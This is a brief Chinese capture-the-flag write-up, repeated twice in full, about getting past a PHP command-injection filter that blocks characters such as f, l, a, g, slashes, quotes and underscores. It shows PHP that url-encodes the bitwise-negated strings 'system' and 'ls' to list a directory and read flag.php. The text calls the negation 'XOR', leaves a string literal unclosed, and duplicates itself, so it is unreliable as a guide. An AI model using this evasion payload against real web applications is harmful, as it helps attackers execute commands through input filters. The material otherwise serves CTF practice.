我们可以看出这里过滤了f、l、a、g、/、;、"、'、’、`、||、[、]、_等等
我们可以使用异或函数进行绕过
<?php
echo urlencode(~"system");
echo "\n;
echo urlencode(~"ls");
我们将这一串字符输入到地址栏中,进行扫描目录操作
接下来我们打开flag.php文件
成功~
我们可以看出这里过滤了f、l、a、g、/、;、"、'、’、`、||、[、]、_等等
我们可以使用异或函数进行绕过
<?php
echo urlencode(~"system");
echo "\n;
echo urlencode(~"ls");
我们将这一串字符输入到地址栏中,进行扫描目录操作
接下来我们打开flag.php文件
成功~